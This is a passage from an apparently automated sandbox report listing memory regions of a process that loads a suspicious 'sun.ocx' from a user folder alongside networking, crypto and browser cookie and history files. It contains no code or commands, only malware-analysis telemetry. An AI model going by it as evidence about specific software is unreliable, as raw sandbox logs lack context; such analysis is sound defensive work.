shared\\clicktorun\\c2r32.dll") Region: id = 1795 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1796 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1797 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1798 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1799 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1800 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1801 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1802 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1803 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1804 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1805 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1806 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1807 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1808 start_va = 0x72b60000 end_va = 0x72b76fff monitored = 0 entry_point = 0x72b61c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1809 start_va = 0x743a0000 end_va = 0x743aafff monitored = 0 entry_point = 0x743a1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1810 start_va = 0x775b0000 end_va = 0x775d9fff monitored = 0 entry_point = 0x775b12fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1811 start_va = 0x2d0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1812 start_va = 0x630000 end_va = 0x7b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 1813 start_va = 0x110000 end_va = 0x12dfff monitored = 0 entry_point = 0x12158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1814 start_va = 0x110000 end_va = 0x12dfff monitored = 0 entry_point = 0x12158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1815 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1816 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1817 start_va = 0x110000 end_va = 0x110fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui") Region: id = 1818 start_va = 0x7c0000 end_va = 0x940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 1819 start_va = 0x950000 end_va = 0x1d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 1820 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 1821 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1822 start_va = 0x73340000 end_va = 0x73342fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1823 start_va = 0x1d50000 end_va = 0x201efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1824 start_va = 0x140000 end_va = 0x140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1825 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1826 start_va = 0x140000 end_va = 0x140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1827 start_va = 0x150000 end_va = 0x156fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1828 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1829 start_va = 0x150000 end_va = 0x15dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1830 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 1831 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1832 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1833 start_va = 0x2d0000 end_va = 0x337fff monitored = 1 entry_point = 0x2d1470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1834 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1835 start_va = 0x2d0000 end_va = 0x337fff monitored = 1 entry_point = 0x2d1470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1836 start_va = 0x2d0000 end_va = 0x337fff monitored = 1 entry_point = 0x2d1470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1837 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1838 start_va = 0x6ab00000 end_va = 0x6ab5ffff monitored = 1 entry_point = 0x6ab01470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1839 start_va = 0x2020000 end_va = 0x7f7efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 1842 start_va = 0x160000 end_va = 0x183fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1843 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1844 start_va = 0x220000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1845 start_va = 0x2020000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 1846 start_va = 0x10000000 end_va = 0x10026fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 1847 start_va = 0x741b0000 end_va = 0x7422ffff monitored = 0 entry_point = 0x741c37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1848 start_va = 0x2120000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 1849 start_va = 0x440000 end_va = 0x51efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1850 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1851 start_va = 0x74170000 end_va = 0x74182fff monitored = 0 entry_point = 0x74171d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1852 start_va = 0x67df0000 end_va = 0x67e06fff monitored = 0 entry_point = 0x67df35fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1853 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1854 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1855 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1856 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1857 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1858 start_va = 0x6fa20000 end_va = 0x6fa2cfff monitored = 0 entry_point = 0x6fa211e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1859 start_va = 0x67db0000 end_va = 0x67decfff monitored = 0 entry_point = 0x67db10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1860 start_va = 0x300000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1861 start_va = 0x360000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1862 start_va = 0x2260000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 1863 start_va = 0x2300000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1864 start_va = 0x2340000 end_va = 0x829efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1865 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1866 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1867 start_va = 0x260000 end_va = 0x283fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1868 start_va = 0x2d0000 end_va = 0x2f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1869 start_va = 0x190000 end_va = 0x191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1870 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1871 start_va = 0x200000 end_va = 0x200fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1872 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1873 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1874 start_va = 0x340000 end_va = 0x347fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1875 start_va = 0x350000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1876 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1877 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1878 start_va = 0x2340000 end_va = 0x242ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1879 start_va = 0x74320000 end_va = 0x74363fff monitored = 0 entry_point = 0x743363f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1880 start_va = 0x25f0000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 1881 start_va = 0x74300000 end_va = 0x7431bfff monitored = 0 entry_point = 0x7430a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1882 start_va = 0x742f0000 end_va = 0x742f6fff monitored = 0 entry_point = 0x742f128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1883 start_va = 0x77230000 end_va = 0x77232fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 1884 start_va = 0x2130000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1885 start_va = 0x21e0000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1886 start_va = 0x2350000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1887 start_va = 0x23f0000 end_va = 0x242ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 1888 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1889 start_va = 0x2630000 end_va = 0x858efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1890 start_va = 0x2170000 end_va = 0x2193fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 1891 start_va = 0x21a0000 end_va = 0x21c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 1892 start_va = 0x76b60000 end_va = 0x76b8efff monitored = 0 entry_point = 0x76b62a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1893 start_va = 0x67580000 end_va = 0x675befff monitored = 0 entry_point = 0x67582351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1894 start_va = 0x2470000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 1895 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 1896 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1897 start_va = 0x74110000 end_va = 0x74161fff monitored = 0 entry_point = 0x741114be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1898 start_va = 0x740f0000 end_va = 0x74104fff monitored = 0 entry_point = 0x740f12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1899 start_va = 0x740e0000 end_va = 0x740ecfff monitored = 0 entry_point = 0x740e1326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1900 start_va = 0x2630000 end_va = 0x858efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1901 start_va = 0x2220000 end_va = 0x2243fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1902 start_va = 0x22a0000 end_va = 0x22c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 1903 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1904 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1905 start_va = 0x24c0000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 1906 start_va = 0x2750000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 1907 start_va = 0x740d0000 end_va = 0x740d5fff monitored = 0 entry_point = 0x740d125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1908 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1909 start_va = 0x2790000 end_va = 0x86eefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 1910 start_va = 0x22d0000 end_va = 0x22f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 1911 start_va = 0x2390000 end_va = 0x23b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 1912 start_va = 0x740c0000 end_va = 0x740cffff monitored = 0 entry_point = 0x740c38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1913 start_va = 0x2790000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 1914 start_va = 0x2630000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1915 start_va = 0x2790000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 1916 start_va = 0x2960000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 1917 start_va = 0x2640000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 1918 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 1919 start_va = 0x28a0000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 1920 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1921 start_va = 0x2970000 end_va = 0x88cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 2085 start_va = 0x23c0000 end_va = 0x23e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 2086 start_va = 0x2430000 end_va = 0x2456fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 2087 start_va = 0x74270000 end_va = 0x74275fff monitored = 0 entry_point = 0x742714b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2088 start_va = 0x742a0000 end_va = 0x742dbfff monitored = 0 entry_point = 0x742a145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2089 start_va = 0x2550000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 2090 start_va = 0x74290000 end_va = 0x74294fff monitored = 0 entry_point = 0x742915df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 2091 start_va = 0x26e0000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 2092 start_va = 0x2850000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 2093 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2094 start_va = 0x2970000 end_va = 0x88cefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 2095 start_va = 0x25b0000 end_va = 0x25d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2096 start_va = 0x2680000 end_va = 0x26a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 2097 start_va = 0x74060000 end_va = 0x74076fff monitored = 0 entry_point = 0x74063573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2098 start_va = 0x67d40000 end_va = 0x67d47fff monitored = 0 entry_point = 0x67d434d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 2099 start_va = 0x69a00000 end_va = 0x69a07fff monitored = 0 entry_point = 0x69a010e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2100 start_va = 0x67470000 end_va = 0x674a7fff monitored = 0 entry_point = 0x67471489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 2101 start_va = 0x74060000 end_va = 0x74076fff monitored = 0 entry_point = 0x74063573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2102 start_va = 0x2790000 end_va = 0x27cbfff monitored = 0 entry_point = 0x279128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2103 start_va = 0x2790000 end_va = 0x27cbfff monitored = 0 entry_point = 0x279128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2104 start_va = 0x2790000 end_va = 0x27cbfff monitored = 0 entry_point = 0x279128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2105 start_va = 0x2790000 end_va = 0x27cbfff monitored = 0 entry_point = 0x279128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") 